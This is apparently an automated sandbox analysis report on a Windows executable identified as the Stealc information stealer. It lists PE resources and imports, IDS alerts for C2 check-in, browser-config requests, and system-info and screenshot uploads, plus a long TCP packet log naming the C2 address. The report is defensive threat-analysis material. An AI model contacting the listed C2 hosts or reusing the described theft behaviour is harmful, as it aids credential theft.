                                                                                                                                            .reloc0x2eb0000x186c0x1a0046c67fc608cf0320b04d5ee61721da87False0.3876201923076923data3.8306017038734197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            PONUFIKOHEWIHUJAFEXOVUD0xabaf80x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilIndia0.6047337278106509
                                                                                                                                            PONUFIKOHEWIHUJAFEXOVUD0xabaf80x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilSri Lanka0.6047337278106509
                                                                                                                                            VIDUHAVOCOKUVIZAVAMUDUVUZINA0xad8500x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5871393453228102
                                                                                                                                            VIDUHAVOCOKUVIZAVAMUDUVUZINA0xad8500x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5871393453228102
                                                                                                                                            YUFABIX0xac4e00x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5939698492462312
                                                                                                                                            YUFABIX0xac4e00x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5939698492462312
                                                                                                                                            RT_CURSOR0xaf6e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                                                            RT_CURSOR0xb05880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                                                            RT_CURSOR0xb0e300x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                                                            RT_CURSOR0xb13c80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                                                                            RT_CURSOR0xb14f80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                                                                            RT_CURSOR0xb15d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                                                                            RT_CURSOR0xb24780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                                                                            RT_CURSOR0xb2d200x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                                                                            RT_CURSOR0xb32b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                                                                            RT_CURSOR0xb41600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                                                                            RT_CURSOR0xb4a080x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                                                                            RT_ICON0xa28900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5368663594470046
                                                                                                                                            RT_ICON0xa28900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5368663594470046
                                                                                                                                            RT_ICON0xa2f580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4091286307053942
                                                                                                                                            RT_ICON0xa2f580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4091286307053942
                                                                                                                                            RT_ICON0xa55000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                                                                                                                            RT_ICON0xa55000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                                                                                                                            RT_ICON0xa59980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.49173773987206826
                                                                                                                                            RT_ICON0xa59980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.49173773987206826
                                                                                                                                            RT_ICON0xa68400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.47247292418772563
                                                                                                                                            RT_ICON0xa68400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.47247292418772563
                                                                                                                                            RT_ICON0xa70e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.434971098265896
                                                                                                                                            RT_ICON0xa70e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.434971098265896
                                                                                                                                            RT_ICON0xa76500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27977178423236515
                                                                                                                                            RT_ICON0xa76500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27977178423236515
                                                                                                                                            RT_ICON0xa9bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.28775797373358347
                                                                                                                                            RT_ICON0xa9bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.28775797373358347
                                                                                                                                            RT_ICON0xaaca00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3086065573770492
                                                                                                                                            RT_ICON0xaaca00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3086065573770492
                                                                                                                                            RT_ICON0xab6280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3404255319148936
                                                                                                                                            RT_ICON0xab6280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3404255319148936
                                                                                                                                            RT_DIALOG0xb52000x58data0.8977272727272727
                                                                                                                                            RT_STRING0xb52580x346dataTamilIndia0.46420047732696895
                                                                                                                                            RT_STRING0xb52580x346dataTamilSri Lanka0.46420047732696895
                                                                                                                                            RT_STRING0xb55a00x36edataTamilIndia0.4715261958997722
                                                                                                                                            RT_STRING0xb55a00x36edataTamilSri Lanka0.4715261958997722
                                                                                                                                            RT_STRING0xb59100x672dataTamilIndia0.42424242424242425
                                                                                                                                            RT_STRING0xb59100x672dataTamilSri Lanka0.42424242424242425
                                                                                                                                            RT_STRING0xb5f880x3b0dataTamilIndia0.4523305084745763
                                                                                                                                            RT_STRING0xb5f880x3b0dataTamilSri Lanka0.4523305084745763
                                                                                                                                            RT_ACCELERATOR0xaf6880x58dataTamilIndia0.7954545454545454
                                                                                                                                            RT_ACCELERATOR0xaf6880x58dataTamilSri Lanka0.7954545454545454
                                                                                                                                            RT_GROUP_CURSOR0xb13980x30data0.9375
                                                                                                                                            RT_GROUP_CURSOR0xb15a80x22data1.0588235294117647
                                                                                                                                            RT_GROUP_CURSOR0xb32880x30data0.9375
                                                                                                                                            RT_GROUP_CURSOR0xb4f700x30data0.9375
                                                                                                                                            RT_GROUP_ICON0xa59680x30dataTamilIndia0.9375
                                                                                                                                            RT_GROUP_ICON0xa59680x30dataTamilSri Lanka0.9375
                                                                                                                                            RT_GROUP_ICON0xaba900x68dataTamilIndia0.7019230769230769
                                                                                                                                            RT_GROUP_ICON0xaba900x68dataTamilSri Lanka0.7019230769230769
                                                                                                                                            RT_VERSION0xb4fa00x25cdata0.5447019867549668

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            KERNEL32.dllGetTempFileNameW, WriteConsoleInputW, GetConsoleAliasExesA, CallNamedPipeA, CreateProcessW, InterlockedIncrement, OpenJobObjectA, InterlockedDecrement, GetCurrentProcess, GetComputerNameW, GetTimeFormatA, FreeEnvironmentStringsA, GetCommConfig, GetDllDirectoryW, GetNumberFormatA, ClearCommBreak, EnumTimeFormatsW, TlsSetValue, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, GetFileAttributesW, GetModuleFileNameW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GlobalUnfix, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, LoadLibraryA, SetEnvironmentVariableA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetVersionExA, ReadConsoleInputW, SetFileAttributesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, HeapAlloc, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, HeapSize, GetLocaleInfoA, RaiseException, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, CloseHandle

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            TamilIndia
                                                                                                                                            TamilSri Lanka

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-10-31T17:12:02.707778+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:02.950019+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449730185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:03.087845+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.235.128.1680192.168.2.449730TCP
                                                                                                                                            2024-10-31T17:12:03.319547+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449730185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:03.327071+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.235.128.1680192.168.2.449730TCP
                                                                                                                                            2024-10-31T17:12:03.974595+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449730185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:04.497760+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449730185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:18.847820+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449755TCP
                                                                                                                                            2024-10-31T17:12:19.028451+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:21.221320+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:22.447065+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:23.327104+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:26.250802+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:26.891766+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:29.198322+01002044249ET MALWARE Win32/Stealc Submitting Screenshot to C21192.168.2.449754185.235.128.1680TCP
                                                                                                                                            2024-10-31T17:12:32.171102+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.44976187.106.236.48443TCP
                                                                                                                                            2024-10-31T17:12:57.211015+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449765TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 31, 2024 17:11:54.223854065 CET49675443192.168.2.4173.222.162.32
                                                                                                                                            Oct 31, 2024 17:12:01.532342911 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:01.537415981 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:01.537516117 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:01.537691116 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:01.543345928 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.359409094 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.359600067 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:02.367902040 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:02.372812033 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.707492113 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.707777977 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:02.713686943 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:02.718744993 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.949850082 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.949876070 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.949924946 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:02.950018883 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:02.950052977 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.082947969 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.087845087 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319396973 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319463968 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319504976 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319546938 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.319585085 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.319698095 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319731951 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319736958 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.319788933 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.319859982 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319894075 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.319900036 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.319931030 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.322055101 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.327070951 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.558397055 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.558511972 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.581949949 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.582016945 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:03.587364912 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.587449074 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.587476969 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.587507963 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.587558985 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.587587118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.587615013 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.833117008 CET49675443192.168.2.4173.222.162.32
                                                                                                                                            Oct 31, 2024 17:12:03.974469900 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:03.974595070 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.262918949 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.267916918 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497580051 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497625113 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497725964 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497760057 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.497766018 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497796059 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.497842073 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.497931957 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497944117 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.497977018 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.498213053 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.498255968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.498331070 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.498343945 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.498374939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.498389959 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.498538017 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.498550892 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.498598099 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.498611927 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.498938084 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.499006987 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.499039888 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.499052048 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.499084949 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.619478941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.619507074 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.619517088 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.619582891 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.619609118 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.619769096 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.619780064 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.619791031 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.619802952 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.619834900 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.620168924 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.620222092 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.620323896 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.620338917 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.620364904 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.620393038 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.620613098 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.620624065 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.620635033 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.620661020 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.620688915 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.620987892 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621033907 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.621139050 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621150017 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621185064 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.621469975 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621479988 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621485949 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621553898 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.621928930 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.621977091 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.621997118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.622006893 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.622049093 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.622293949 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.622304916 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.622317076 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.622350931 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.622370005 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.735629082 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735753059 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735781908 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.735789061 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735824108 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.735832930 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735853910 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.735882044 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.735903978 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735938072 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735958099 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.735970974 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.735984087 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736006021 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.736015081 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736051083 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736315966 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.736371040 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736445904 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.736494064 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736601114 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.736634016 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.736651897 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736668110 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.736679077 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.736715078 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737104893 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737137079 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737152100 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737170935 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737184048 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737204075 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737214088 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737252951 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737616062 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737648010 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737659931 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737682104 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737693071 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737715960 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737729073 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737750053 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.737760067 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.737795115 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738284111 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738316059 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738331079 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738349915 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738358021 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738395929 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738825083 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738858938 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738869905 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738892078 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738902092 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738924980 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738933086 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.738959074 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.738965034 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.739006996 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.739022017 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.739051104 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.854438066 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.854475021 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.854506969 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.854579926 CET4973080192.168.2.4185.235.128.16
